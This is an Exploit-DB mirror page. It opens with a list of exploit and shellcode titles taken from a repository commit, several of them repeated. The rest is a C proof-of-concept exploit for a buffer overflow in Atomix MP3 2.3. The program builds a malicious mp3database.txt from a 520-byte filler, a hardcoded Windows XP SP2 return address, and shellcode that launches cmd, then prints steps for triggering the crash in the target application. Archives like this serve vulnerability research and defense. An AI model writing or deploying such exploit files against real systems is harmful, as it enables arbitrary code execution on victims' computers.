exploit-db-mirror/exploits/windows/dos/29942.c
Offensive Security 880bbe402e DB: 2019-03-08
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

85 lines
No EOL
3.2 KiB
C

// source: https://www.securityfocus.com/bid/23756/info
Atomix MP3 is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker could exploit this issue by enticing a victim to load a malicious MP3 file. If successful, the attacker can execute arbitrary code in the context of the affected application.
////////////////////////////////// [ STARTING CODE ]
////////////////////////////////////////////////////
////
//// [ Explanation ] this probe of concept make
//// a malicious file that exploit the error.
////
////
//// [ Note ]
//// it was coded for Windows XP with SP2-es
//// if you want to try it into your own PC
//// it is necessary that you change this Offsets
//// for your own offsets.
////
//// on:
//// char offset[]="";
//// AND
//// mov ebx,0x77BF93C7
////
//// Enjoy it n_nU!..
//// Coded by preth00nker (using Mexican skill!)
#include <stdio.h>
#include <conio.h>
#include <string.h>
char shellcode[] = //A simple CMD Call =)
"\x55" //push ebp
"\x8B\xEC" //mov ebp,esp
"\x33\xFF" //xor edi,edi
"\x57" //push edi
"\xC6\x45\xFC\x63" //mov byte ptr [ebp-04h],63h
"\xC6\x45\xFD\x6D" //mov byte ptr [ebp-03h],6Dh
"\xC6\x45\xFE\x64" //mov byte ptr [ebp-02h],64h
"\x8D\x45\xFC" //lea eax,[ebp-04h]
"\x50" //push eax
"\xBB\xC7\x93\xBF\x77" //mov ebx,0x77BF93C7
"\xFF\xD3"; //call ebx
/*Evilbuffer - 520 Bytes Free4exploit*/
char evilbuffer[521] = "";
/*Data Base for songs found into the computer*/
char file[] = "mp3database.txt";
/*Call ESP SP2-es*/
char offset[] = "\x8B\x51\x81\x7C";
char temp[1024];
int main(){
printf("\n\n##################################################\n");
printf("######\n");
printf("###### Exploit Atomix 2.3\n");
printf("###### By Preth00nker\n");
printf("###### Preth00nker [at] gmail [dot] com\n");
printf("###### http://www.mexhackteam.org\n\n\n");
printf("###### http://www.prethoonker.tk\n\n\n");
FILE *fich;
memset(evilbuffer,'M',520);
fich=fopen(file,"w+");
printf(" (*) Creating the file: %s\n", file);
strcpy(temp,evilbuffer);
printf(" (*) Adding the evilbuffer\n");
strcat(temp,offset);
printf(" (*) Adding the Offset: %s\n", offset);
strcat(temp,shellcode);
printf(" (*) Adding the Sellcode\n");
fwrite(temp, strlen(temp),1, fich);
printf(" (*) Writting into the file\n");
printf(" [ Usage: ]\n");
printf("Step 1.- Generate the Evil File into the %ProgramFiles%\\AtomixMP3\\ \n");
printf("Step 2.- Run atomixmp3.exe\n");
printf("Step 3.- Click On Search module and Click (again) on the unique file found.\n");
printf("have fun =)!");
fclose(fich);
return 0;
}
////
////
////////////////////////////////////////// [ E O F ]
////////////////////////////////////////////////////